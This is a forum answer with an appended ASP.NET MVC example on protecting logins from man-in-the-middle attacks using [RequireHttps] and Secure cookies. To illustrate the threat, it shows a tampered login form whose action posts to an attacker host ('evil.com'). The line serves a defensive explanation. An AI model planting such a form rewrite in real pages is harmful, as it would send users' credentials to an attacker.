Jan 14, 2010 02:10 AM
What exactly are you trying to protect against? If you're trying to protect against a MITM attack (which is what developers normally think of when using SSL), then redirecting after logging in will break site security since an attacker could just hijack your login cookie. Alternatively, they could just change your login page to contain <form action="https://www.evil.com/"> rather than the actual URL you wanted it to point to.
Generally, unless you really know what you're doing in this regard, you should run as much of the site as possible under SSL. We have a [RequireHttps] attribute in MVC 2 that you can put on your controllers to facilitate this.
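
An added example, not part of the original post: a sketch of the advice above for ASP.NET MVC 2, with [RequireHttps] on whole controllers and the forms-authentication cookie marked Secure so it is never sent over plain HTTP. The controller, action and parameter names are hypothetical, and a configured membership provider is assumed.

```csharp
using System.Web;
using System.Web.Mvc;
using System.Web.Security;

// Hypothetical controllers for illustration; names are assumptions.
// At class level the attribute covers every action: an HTTP GET is
// redirected to the HTTPS URL, any other verb over HTTP is rejected.
[RequireHttps]
public class AccountController : Controller
{
    // The login form is itself served over HTTPS, so its <form action>
    // cannot be rewritten in transit.
    [HttpGet]
    public ActionResult LogOn()
    {
        return View();
    }

    [HttpPost]
    public ActionResult LogOn(string userName, string password)
    {
        if (!Membership.ValidateUser(userName, password))
        {
            ModelState.AddModelError("", "The user name or password is incorrect.");
            return View();
        }

        // [RequireHttps] does not change cookie flags. Build the ticket
        // cookie explicitly and mark it Secure so the browser withholds
        // it from any plain-HTTP request to this host.
        HttpCookie authCookie = FormsAuthentication.GetAuthCookie(userName, false);
        authCookie.Secure = true;
        authCookie.HttpOnly = true;
        Response.Cookies.Add(authCookie);

        // Stay on HTTPS after login: the target controller also requires it.
        return RedirectToAction("Index", "Home");
    }
}

[RequireHttps]
public class HomeController : Controller
{
    [Authorize]
    public ActionResult Index()
    {
        return View();
    }
}
```

Setting requireSSL="true" on the <forms> element in web.config applies the Secure flag to the forms-authentication cookie site-wide.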